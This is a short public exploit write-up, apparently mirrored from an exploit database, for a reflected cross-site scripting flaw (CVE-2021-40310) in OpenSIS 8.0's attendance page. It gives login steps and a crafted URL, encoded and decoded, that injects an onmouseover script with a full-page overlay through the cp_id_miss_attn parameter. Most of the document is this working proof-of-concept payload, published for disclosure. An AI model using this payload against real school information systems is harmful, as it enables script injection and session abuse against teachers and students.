Exploit for OpenSIS 8.0 Cross Site Scripting CVE-2021-40310

## https://sploitus.com/exploit?id=PACKETSTORM:164326
# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)  
# Date: 9/24/2021  
# Exploit Author: Eric Salario  
# Vendor Homepage: http://www.os4ed.com/  
# Software Link: https://opensis.com/download  
# Version: 8.0  
# Tested on: Windows, Linux  
# CVE : CVE-2021-40310  
  
OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.  
  
1. Login as "teacher".  
  
2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true  
  
Decoded request:  
  
GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1  
  
3. XSS triggers  
  
PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc